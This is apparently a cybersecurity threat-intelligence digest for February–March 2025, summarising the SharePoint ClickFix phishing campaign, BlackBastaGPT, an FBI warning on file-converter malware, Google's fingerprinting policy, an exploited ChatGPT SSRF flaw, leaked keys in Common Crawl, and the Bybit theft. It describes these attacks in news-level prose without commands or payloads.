In today’s dynamic cybersecurity landscape, recent incidents from February to March 2025 reveal a growing trend of sophisticated attack methods leveraging trusted platforms and advanced exploitation techniques. Notable cases include a stealthy SharePoint phishing campaign that deploys command-and-control malware through deceptive notifications, alongside emerging tactics that exploit vulnerabilities in widely used systems such as ChatGPT and cloud APIs.
Techniques
SharePoint Phishing Campaign to Deliver Malware
Threat actors are leveraging Microsoft’s SharePoint and Graph API in a stealthy phishing campaign to deploy the Havoc C2 (command-and-control) malware. Researchers at FortiGuard Labs uncovered the scheme, which they describe as a “ClickFix” attack. This social engineering technique manipulates users into executing malicious actions under the guise of troubleshooting or system maintenance, making it particularly deceptive and dangerous.
The initial phishing vector is an email imitating a SharePoint notification, designed to lure recipients into ‘urgently reviewing’ the attached ‘restricted file’. The SharePoint file (crafted Word document) contains a malicious link, which presents an HTML file with a fake error message that tells recipients to copy-paste a PowerShell command into their Windows Terminal. This executes code that retrieves a malicious payload from SharePoint, blending in with standard Microsoft communications. From here, an adversary can deliver malware to the device to perform the next stages of the attack.
This advanced use of legitimate cloud services as a conduit for malware makes the campaign particularly potent. By chaining a trusted application for hosting malware and a trusted channel for C2, the scheme can evade many security filters that would flag unknown domains or direct IP connections. The campaign targeted enterprise Microsoft SharePoint users and demonstrates a high level of sophistication. Defending against such attacks requires strong enterprise endpoint controls, user vigilance, as well as cloud-aware security monitoring to detect abuse of platform APIs.
‘BlackBastaGPT’ – Chatbot Trained on ATP Chat Logs
Cybersecurity researchers at threat intelligence firm Hudson Rock have introduced BlackBastaGPT, a ChatGPT-powered analysis tool. The tool is trained on over a million internal messages leaked from the Black Basta ransomware gang in the wake of a major data breach in February 2025, exposed the gang’s private chat logs. The underlying leak was attributed to an individual using the alias “ExploitWhispers,” who unveiled an extensive trove of technical and organisational details from Black Basta. The chats reveal an illicit enterprise mirroring a corporate structure. The leaked messages expose the gang’s methodology, including discussions of exploits targeting known vulnerabilities in Citrix, Ivanti, and Fortinet systems. They also used phishing lures posing as IT support to deploy malware like Cobalt Strike and SystemBC. Notably, the logs contained a large number of ZoomInfo lookup links used for reconnaissance. This indicate the gang researched victims’ company size and revenue to better tailor their extortion demands.
BlackBastaGPT has transformed raw intelligence into an interactive resource for cybersecurity professionals. Queries reveal the gang heavily favours exploiting unpatched VPN and RDP servers. It confirms that Qakbot and Cobalt Strike are staple tools, and highlights the experimental use of newer payloads like Brute Ratel to evade detection. The logs also contain financial discussions detailing how ransoms are laundered and split among affiliates.
By leveraging generative AI to parse and index 13 months of BlackBasta’s internal chat logs, cybersecurity researchers have gained a unique insight into the inner workings of this groups, learning the adversary’s playbook in depth.
FBI Warns Against Online File Converter Tools
The FBI Denver Field Office has released a statement warning they are seeing increasing numbers of reports of free online document conversion tools being used to load malware onto victims’ computers, leading to ransomware and data theft. They report these tools will almost always complete the task as advertised, but the resulting file download will contain loaders for malware ranging from infostealers to banking/crypto trojans and post-exploitation tools such as Cobalt Strike. Not only will these file converter tools potentially install malicious software, but the uploaded documents may be scraped for sensitive personal information, passwords, and banking or cryptocurrency information.
A cybersecurity researcher well known for tracking infections of ‘Gootloader’, a sophisticated JavaScript-based malware family, identified a Google advertising campaign promoting fake file converter sites in November of last year. Due to the way Google displays ad results, these are often populated at the top of search results, posing a risk where less savvy users may follow these links, and unknowingly infect their device. It is recommended to never use online file conversion tools, and if absolutely necessary, to inspect/scan these, and to never run any executables or JavaScript files obtained from untrusted sources on the web.
Happenings
[Global] Google Embraces Browser Fingerprinting as Cookies Wane
In late 2024, Google announced advertising partners would be permitted to employ fingerprinting techniques from February 16, 2025. Instead of blocking all tracking cookies and potentially losing advertising capabilities, Google has sanctioned an alternative tracking method where users may be identified by their device attributes.
Browser fingerprinting involves gathering a collection of a user’s device and browser characteristics such as operating system, screen resolution, installed fonts, browser plugins, and IP address to create a unique identifier. Unlike cookies, which users can delete or block, a fingerprint is largely outside a user’s control and can persist across browsing sessions. Google itself once acknowledged this practice “subverts user choice and is wrong”, since users cannot reset their fingerprint as they would a cookie. Despite the earlier stance, the newly updated policy means Google’s advertising ecosystem can leverage fingerprints to continue tracking individuals even if cookies are refused. The decision has raised alarms among privacy advocates, as it erodes user agency in favour of advertiser interests.
[US] Year-Old ChatGPT Vulnerability Exploited in Attacks on US Government
Security researchers have observed threat actors actively exploiting a server-side request forgery (SSRF) vulnerability in ChatGPT to attack organisations. The flaw (CVE-2024-27564) exists in a component of the ChatGPT service (pictureproxy.php) and was initially reported in 2023. The vulnerability allows an attacker to inject an arbitrary URL into the request parameter, causing the ChatGPT application server to make unintended requests, giving an attacker the ability to leverage ChatGPT’s backend to access external or internal resources via a crafted malicious links. The vulnerability does not require authentication to exploit, with recent adversaries attempting to exploit this vulnerability in the wild.
The campaign is primarily targeting the U.S. government and financial sector with the majority of the attack traffic directed at U.S.-based systems. There were also attempts noted against financial and healthcare organisations in countries such as Germany, Thailand, Indonesia, Colombia, and the UK, suggesting a broad but strategically weighted operation. This shows the importance of patching web application flaws even if they seem niche. Organisations using ChatGPT integrations should ensure the latest patches are applied and monitor for unusual outbound requests from these services.
[Global] 12,000 API Keys Found in AI Training Data Expose Coding Lapses
Security researchers at Truffle Security have uncovered nearly 12,000 API keys, credentials, and passwords inadvertently included in a popular AI training dataset. The secrets were found in the Common Crawl corpus, which has petabytes of data collected over 12 years of web crawling. The data is frequently used to train large language models (LLMs) for tech firms including OpenAI, Google, and Meta. Truffle Security used their TruffleHog secret-scanning tool to sift through 400 TB of ‘Common Crawl’s December 2024’ data (covering around 2.67 billion web pages) and identified 11,908 unique secrets that were still valid. These credentials, embedded in publicly accessible web pages and code, range from cloud platform keys to online service API tokens. The discovery highlights how insecure coding practices can bleed into AI datasets, potentially feeding sensitive information into AI models.
Exposed to the wild, an attacker scanning for leaked keys could hijack them to access cloud resources, steal data, send fraudulent emails, or impersonate brands. Leaked API tokens allow unauthorised access to services and databases, leading to breaches or data exfiltration. Upon discovering the issue, Truffle Security notified the affected platforms and many of the compromised keys were promptly revoked or rotated, reducing the potential attack vector. This shows, companies building LLMs need even more robust data sanitisation to filter out confidential information and developers must adopt safer secret management to prevent accidentally leaking of secrets to the entire internet.
[AE] Largest ever Crypto Exchange Theft Attributed to North Korean APT
Dubai-based cryptocurrency exchange Bybit suffered a theft of 400,000 Ethereum tokens, which equates to roughly $1.3 billion NZD worth of digital assets making this the largest crypto exchange hack on record. Bybit moved quickly to restore customer funds, securing emergency replacement of the lost Ethereum within 72 hours. Blockchain analysis firms traced the stolen funds to wallets associated with Lazarus group, a state-sponsored North Korean hacking team known for crypto theft operations. The FBI later confirmed North Korea’s involvement, codenaming the activity “TraderTraitor” and attributing the Bybit hack to cyber actors from Democratic People’s Republic of Korea DPRK, which aligns with past Lazarus exploits.
The attackers demonstrated sophisticated laundering operations to cash out the crypto haul. According to an FBI advisory, the thieves rapidly converted large portions of the Ethereum into Bitcoin and dispersed the funds across thousands of blockchain addresses. This complex web of transactions is designed to obfuscate the money trail and thwart tracking efforts, and it is likely none of the cryptocurrency will be recoverable